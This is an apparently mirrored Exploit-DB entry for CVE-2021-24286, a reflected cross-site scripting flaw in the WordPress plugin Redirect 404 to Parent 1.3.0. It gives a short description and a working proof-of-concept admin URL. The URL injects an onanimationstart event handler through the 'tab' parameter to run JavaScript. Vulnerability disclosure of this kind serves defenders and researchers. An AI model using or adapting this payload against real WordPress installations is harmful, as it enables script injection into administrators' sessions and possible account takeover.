WordPress Plugin Redirect 404 to Parent 1.3.0 – Reflected Cross-Site Scripting

  • 作者: 0xB9
    日期: 2021-09-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50350/
  • # Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
    # Date: 2/3/2021
    # Author: 0xB9
    # Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
    # Version: 1.3.0
    # Tested on: Windows 10
    # CVE: CVE-2021-24286
    
    1. Description:
    This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
    
    2. Proof of Concept:
    wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);